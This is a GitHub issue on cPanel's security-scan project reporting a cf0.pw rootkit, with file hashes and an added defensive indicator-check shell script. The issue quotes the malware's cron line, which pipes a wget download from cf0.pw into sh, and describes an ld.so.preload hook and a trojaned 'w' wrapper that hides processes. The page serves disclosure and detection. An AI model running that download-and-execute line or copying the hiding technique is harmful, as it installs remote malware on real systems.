CpanelInc / tech-CSI

cPanel Security Scan
Other

rootkit created /etc/cron.hourly/0 file with wget download plus two r… #13

Closed JQuags closed 1 year ago

JQuags commented 1 year ago

Rootkit from cf0.pw. Using a preload, any binary call created a /tmp file and checked/created /etc/cron.hourly/0.

cPanelPeter commented 1 year ago

Thank you. Will add this shortly. Do you happen to have the sha256 hash for the ELF binary?

cPanelPeter commented 1 year ago

implemented this patch

JQuags commented 1 year ago

Here are the hashes

67833062305246c82a3817a5038e0aec7de91931e64c4aeb9ef96b67a51a195d /usr/bin/w

Linked to /usr/bin/w-

/usr/bin/w source

/usr/bin/w- $@ |grep -v systemd

982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf /etc/cron.hourly/0

/etc/cron.hourly/0 source

wget --quiet http://cf0.pw/0/etc/cron.hourly/0 -O- 2>/dev/null|sh>/dev/null 2>&1

and the downloaded ELF: 179824df02415e8a9df6eb698eef68c61827b95cfc254f86b57afdaa37b8955f
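An added indicator check for the artifacts reported in this issue. This is example code written for this page, not part of cPanel's csi.pl or of the patch cPanelPeter refers to. It assumes the indicators exactly as posted above: an /etc/ld.so.preload hook, /etc/cron.hourly/0 piping a wget download into sh, /usr/bin/w replaced by a script that calls /usr/bin/w- and filters out "systemd", and the three SHA-256 hashes. It assumes GNU `sha256sum` is installed and takes a root directory argument (default `/`) so it can also be pointed at a mounted image or a scratch tree; the library name in the comments is a hypothetical placeholder.

```shell
#!/bin/sh
# Example indicator check for the cf0.pw rootkit artifacts from this issue.
# Not cPanel's code. ROOT defaults to "/" on a live host; pass a mounted
# image or test directory as the first argument of scan_root instead.

# SHA-256 hashes posted in this issue: trojaned /usr/bin/w, /etc/cron.hourly/0,
# and the ELF the cron job downloads.
KNOWN_BAD_HASHES="67833062305246c82a3817a5038e0aec7de91931e64c4aeb9ef96b67a51a195d
982f9e0f089b91ba79df723435099df15c72e1201a45010ee60226ab136c93bf
179824df02415e8a9df6eb698eef68c61827b95cfc254f86b57afdaa37b8955f"

# Returns 0 if the file's SHA-256 is in the known-bad list (assumes GNU sha256sum).
hash_is_known_bad() {
    f="$1"
    [ -f "$f" ] || return 1
    h=$(sha256sum "$f" | cut -d' ' -f1)
    printf '%s\n' "$KNOWN_BAD_HASHES" | grep -qx "$h"
}

# Returns 0 if ROOT/etc/cron.hourly/0 exists and pipes a wget/curl download
# straight into a shell, or references the cf0.pw host named in this issue.
cron_hourly_0_is_downloader() {
    root="${1:-/}"
    f="$root/etc/cron.hourly/0"
    [ -f "$f" ] || return 1
    grep -Eq '(wget|curl)[^|]*[|][[:space:]]*(ba)?sh' "$f" || grep -q 'cf0\.pw' "$f"
}

# Returns 0 if ROOT/usr/bin/w is a script wrapper around w- that filters
# output with grep -v (the posted wrapper hides lines containing "systemd").
# A genuine w(1) is an ELF executable, so an ELF magic is treated as clean.
w_is_trojaned_wrapper() {
    root="${1:-/}"
    w="$root/usr/bin/w"
    [ -f "$w" ] || return 1
    if head -c 4 "$w" | grep -q 'ELF'; then return 1; fi
    grep -q 'w-' "$w" && grep -q 'grep -v' "$w"
}

# Returns 0 if ROOT/etc/ld.so.preload names at least one library path
# (e.g. a hypothetical /usr/lib/libhide.so), the hook the reporter describes.
ld_preload_present() {
    root="${1:-/}"
    f="$root/etc/ld.so.preload"
    [ -s "$f" ] && grep -Eq '^[[:space:]]*/' "$f"
}

# Runs every check against ROOT, prints each hit, returns 0 if anything fired
# and 1 if the tree looks clean.
scan_root() {
    root="${1:-/}"
    found=1
    if ld_preload_present "$root"; then
        echo "HIT: $root/etc/ld.so.preload lists: $(tr '\n' ' ' < "$root/etc/ld.so.preload")"
        found=0
    fi
    if cron_hourly_0_is_downloader "$root"; then
        echo "HIT: $root/etc/cron.hourly/0 pipes a download into sh"
        found=0
    fi
    if w_is_trojaned_wrapper "$root"; then
        echo "HIT: $root/usr/bin/w is a script wrapper, not an ELF"
        found=0
    fi
    for rel in usr/bin/w usr/bin/w- etc/cron.hourly/0; do
        if hash_is_known_bad "$root/$rel"; then
            echo "HIT: $root/$rel matches a known-bad SHA-256 from this issue"
            found=0
        fi
    done
    return $found
}

# Usage: sh check_cf0.sh --scan [ROOT]
if [ "${1:-}" = "--scan" ]; then
    scan_root "${2:-/}"
fi
```

The hash list alone is brittle (a rebuilt dropper changes it), so the behavioural checks carry the weight: a cron script that pipes a download into `sh`, a non-ELF `/usr/bin/w` that shells out to `w-`, and any populated `ld.so.preload` are each worth an alert on a cPanel host regardless of hash.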